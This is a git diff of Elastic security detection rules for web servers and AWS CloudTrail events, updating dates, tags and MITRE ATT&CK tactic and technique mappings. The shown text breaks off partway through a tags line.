a/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml +++ b/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,18 +50,7 @@ This rule flags surges of web requests that advertise scanner or brute-force too risk_score = 21 rule_id = "a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35" severity = "low" -tags = [ - "Domain: Web", - "Use Case: Threat Detection", - "Tactic: Reconnaissance", - "Tactic: Credential Access", - "Data Source: Nginx", - "Data Source: Apache", - "Data Source: Apache Tomcat", - "Data Source: IIS", - "Data Source: Traefik", - "Resources: Investigation Guide", -] +tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Reconnaissance", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -126,11 +115,6 @@ id = "T1595" name = "Active Scanning" reference = "https://attack.mitre.org/techniques/T1595/" -[[rule.threat.technique.subtechnique]] -id = "T1595.001" -name = "Scanning IP Blocks" -reference = "https://attack.mitre.org/techniques/T1595/001/" - [[rule.threat.technique.subtechnique]] id = "T1595.002" name = "Vulnerability Scanning" @@ -145,16 +129,3 @@ reference = "https://attack.mitre.org/techniques/T1595/003/" id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/aws/collection_cloudtrail_logging_created.toml b/rules/integrations/aws/collection_cloudtrail_logging_created.toml index 21998af8115..839ce6d42d9 100644 --- a/rules/integrations/aws/collection_cloudtrail_logging_created.toml +++ b/rules/integrations/aws/collection_cloudtrail_logging_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -69,15 +69,7 @@ references = [ risk_score = 21 rule_id = "594e0cbf-86cc-45aa-9ff7-ff27db27d3ed" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Cloudtrail", - "Use Case: Log Auditing", - "Tactic: Collection", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Cloudtrail", "Use Case: Log Auditing", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -91,17 +83,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml b/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml index d649ef077c5..8faabf103c2 100644 --- a/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml +++ b/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,15 +92,7 @@ risk_score = 47 rule_id = "59bf26c2-bcbe-11ef-a215-f661ea17fbce" setup = "S3 data events must be enabled in CloudTrail to capture the GetObject, PutObject, ListObjects, and DeleteObject actions. Ensure that the AWS CloudTrail service is configured to log data events for the S3 bucket you'd like to monitor." severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: Amazon S3", - "Use Case: Asset Visibility", - "Resources: Investigation Guide", - "Tactic: Collection", -] +tags = ["Domain: Cloud", "Tactic: Collection", "Tactic: Discovery", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon S3", "Use Case: Asset Visibility", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -121,42 +113,42 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1619" name = "Cloud Storage Object Discovery" reference = "https://attack.mitre.org/techniques/T1619/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml b/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml index 7bf37ce9e83..244fef8f9cb 100644 --- a/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml +++ b/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/10" integration = ["aws"] maturity = "production" -updated_date = "2025/06/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,22 +95,16 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" -[[rule.threat.technique.subtechnique]] -id = "T1552.005" -name = "Cloud Instance Metadata API" -reference = "https://attack.mitre.org/techniques/T1552/005/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.session_context.session_issuer.arn"] diff --git a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml index d134a095da1..5d27f5e2070 100644 --- a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml +++ b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/04" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -74,15 +74,7 @@ references = ["https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserTo risk_score = 21 rule_id = "333de828-8190-4cf5-8d7c-7575846f6fe0" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -97,23 +89,28 @@ event.dataset: aws.cloudtrail and [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml b/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml index 2fd99ea0bd8..d744ecf6047 100644 --- a/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml +++ b/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/21" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -132,17 +132,21 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.threshold] field = ["cloud.account.id"] value = 10 diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml index f762db3aa20..30221b5bef0 100644 --- a/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml +++ b/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/26" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,22 +82,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml index b81501f12d9..1955e7dfa15 100644 --- a/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml +++ b/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,22 +83,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml b/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml index 3dedaf38d39..166538416bc 100644 --- a/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml +++ b/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/15" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -130,27 +130,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" -[[rule.threat.technique.subtechnique]] -id = "T1562.006" -name = "Indicator Blocking" -reference = "https://attack.mitre.org/techniques/T1562/006/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml b/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml index 8d37020dce8..5e84d659e4b 100644 --- a/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml +++ b/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/26" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -129,27 +129,21 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml b/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml index 41c5766b582..941c9de02dd 100644 --- a/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml +++ b/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/16" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -109,27 +109,21 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml b/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml index 67bc1c4472a..2543f7add08 100644 --- a/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml +++ b/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,14 +95,7 @@ references = [ risk_score = 73 rule_id = "e9fe3645-f588-43d6-99f5-437b3ef56f25" severity = "high" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -116,22 +109,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml index 5c526fa7a83..9c3dc41b044 100644 --- a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml +++ b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Austin Songer", "Elastic"] @@ -131,15 +131,7 @@ references = [ risk_score = 47 rule_id = "bf1073bf-ce26-4607-b405-ba1ed8e9e204" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS RDS", - "Use Case: Asset Visibility", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Collection", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS RDS", "Use Case: Asset Visibility", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -153,27 +145,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1578" name = "Modify Cloud Compute Infrastructure" reference = "https://attack.mitre.org/techniques/T1578/" + [[rule.threat.technique.subtechnique]] id = "T1578.002" name = "Create Cloud Instance" reference = "https://attack.mitre.org/techniques/T1578/002/" -[[rule.threat.technique.subtechnique]] -id = "T1578.004" -name = "Revert Cloud Instance" -reference = "https://attack.mitre.org/techniques/T1578/004/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml b/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml index a3f2352b5a1..121aa4b0ea2 100644 --- a/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml +++ b/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/27" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -122,39 +122,29 @@ event.dataset:aws.cloudtrail and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml b/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml index d7bf8608f45..d9ffd7ed065 100644 --- a/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml +++ b/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/12" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -118,15 +118,7 @@ references = [ risk_score = 21 rule_id = "ff320c56-f8fa-11ee-8c44-f661ea17fbce" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: Amazon S3", - "Use Case: Asset Visibility", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon S3", "Use Case: Asset Visibility", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -140,44 +132,21 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" + [[rule.threat.technique.subtechnique]] id = "T1485.001" name = "Lifecycle-Triggered Deletion" reference = "https://attack.mitre.org/techniques/T1485/001/" - - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml index d441f9f41fd..1ae94df10c8 100644 --- a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml +++ b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/08" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,16 +76,7 @@ references = [ risk_score = 47 rule_id = "bab88bb8-cdd9-11ef-bd9a-f661ea17fbcd" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS SQS", - "Use Case: Threat Detection", - "Use Case: Log Auditing", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SQS", "Use Case: Threat Detection", "Use Case: Log Auditing", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -99,22 +90,16 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" - +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml b/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml index ff639694edb..4ae04aa84e1 100644 --- a/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml +++ b/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/19" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -23,16 +23,7 @@ references = [ risk_score = 47 rule_id = "7a5cc9a8-5ea3-11ef-beec-f661ea17fbce" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Amazon Web Services", - "Data Source: AWS", - "Data Source: AWS STS", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Amazon Web Services", "Data Source: AWS", "Data Source: AWS STS", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -90,37 +81,21 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.arn"] diff --git a/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml b/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml index 07be3b05e01..1865f4c799b 100644 --- a/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml +++ b/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/14" integration = ["aws"] maturity = "production" -updated_date = "2025/12/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -116,34 +116,16 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" -[[rule.threat.technique.subtechnique]] -id = "T1552.005" -name = "Cloud Instance Metadata API" -reference = "https://attack.mitre.org/techniques/T1552/005/" - - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name", "aws.cloudtrail.flattened.request_parameters.instanceId"] diff --git a/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml b/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml index 197e4fc57fc..357105f5229 100644 --- a/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml +++ b/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -91,16 +91,7 @@ references = [ risk_score = 47 rule_id = "ea248a02-bc47-4043-8e94-2885b19b2636" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Discovery", - "Tactic: Credential Access", -] +tags = ["Domain: Cloud", "Tactic: 